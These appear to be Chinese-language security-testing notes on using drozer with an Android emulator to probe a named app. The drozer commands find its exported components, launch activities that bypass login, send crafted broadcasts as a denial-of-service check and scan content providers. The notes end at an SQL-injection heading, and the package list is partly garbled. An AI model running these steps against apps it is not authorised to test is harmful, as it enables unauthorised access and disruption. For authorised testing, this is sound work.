dorzer安全测试
- 环境准备:
安装Microsoft Visual C++ 9.0
win10系统的ssl设置 打开
安装逍遥安卓模拟器逍遥安卓模拟器 端口号:21503
安装python2.7,配置环境变量(python的安装路径配置在python里面安装路径,drozer的安装路径C:Python27\Scripts)
安装dorzer pc端, 模拟器或者手机端安装apk
安装JDK1.8
Microsoft Visual C++ 9.0安装包:
Win10,ssl设置打开方法:
打开电脑开始菜单,选择设置菜单,然后控制面板,选择Internet项,选择高级菜单,选择里边的启用SSL2.0,设置一下就好了
python2.7 安装包:
Jdk 安装包:
逍遥模拟器安装包:
Dorzer pc端:
模拟器或者手机端:
Dorzer安装参考文档:
https://www.jianshu.com/p/4ef5b26dd3fb
pip3 install pytest-cov
- Drozer启动
双击启动drozer.bat服务,C:\Python27\Scripts\drozer.bat
打开模拟器,启动drozer客户端,点开启按钮,开启服务
命令行:进入模拟器安装路径:D:\Program Files\Microvirt\MEmu
adb connect 127.0.0.1:21503
adb devices
命令行:进入drozer安装路径:C:\Python27\Scripts
adb forward tcp:31415 tcp:31415
drozer console connect
启动成功:
报错:
解决办法:
查看SDK adb version版本:
查看模拟器下的adb version
C:\Users\zmm\AppData\Local\Android\Sdk\platform-tools\adb.exe
用sdk的adb.exe替换模拟器下的adb.exe,重启
参考文档:
https://blog.csdn.net/wenzhi20102321/article/details/80934037
- Drozer命令使用
Dz>list
3.1、获取模拟器或者手机中app的基本信息
用list命令列出Drozer所有功能模块
run app.package.list 查看模拟器中所有的安装包
dz> run app.package.list
com.android.providers.telephony (绉诲姩缃戠粶閰嶇疆)
com.microvirt.installer (瀹夎绯荤粺搴旂敤)
com.android.providers.calendar (鏃ュ巻瀛樺偍)
com.android.providers.media (濯掍綋瀛樺偍)
com.android.wallpapercropper (com.android.wallpapercropper)
com.shai.ihandle (鎺屼笂缃戜紭)
com.android.documentsui (鏂囨。)
com.android.externalstorage (澶栭儴瀛樺偍璁惧)
com.android.htmlviewer (HTML 鏌ョ湅绋嬪簭)
com.android.providers.downloads (涓嬭浇绠$悊绋嬪簭)
com.android.browser (娴忚鍣?
[Errno 0] Error
run app.package.list -f ihandle 利用关键字搜索报名
run app.package.info -a com.shai.ihandle 查看ihandle基本信息,数据存放路径,apk存放路径等
3.2、查看ihandle的可攻击点
run app.package.attactsurface com.shai.ihandle
3.2.1、查看对外的activity的组件信息
run app.activity.info -f com.shai.ihandle
3.2.2、模拟启动activity --app.activity.start
越权漏洞--绕过登录界面可直接访问基站搜索界面,说明存在越权漏洞,以下界面都可以绕过登录界面直接访问
run app.activity.start --component com.shai.ihandle com.shai.ihandle.ihandle.ihandle.activity.MapQueryActivity1
run app.activity.start --component com.shai.ihandle com.shai.ihandle.ihandle.ihandle.activity.SnavigationActivity
3.2.3、查看查看对外的broadcast组件信息
run app.broadcast.info -a com.shai.ihandle
3.2.3、发送恶意广播
run app.broadcast.send --action com.shai.ihandle.utils.MyJPushMessageReceiver --extra string JPushMessage 11111111111
3.2.4、尝试拒绝服务攻击检测
run app.broadcast.send --action com.shai.ihandle.utils.MyJPushMessageReceiver
向广播组件发送不完整的参数,应用是否停止运行
3.2.5、查看服务信息
run app.service.info -a com.shai.ihandle
3.2.6、启动服务信息
run app.service.start --action org.owasp.goatdroid.fourgoats.services.LocationService --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService
3.2.7、获取Content Provider信息
扫描并获取Content Provider信息,并列出了可访问内容URI的列表和路径:
run scanner.provider.finduris -a com.shai.ihandle
3.2.7、sql注入漏洞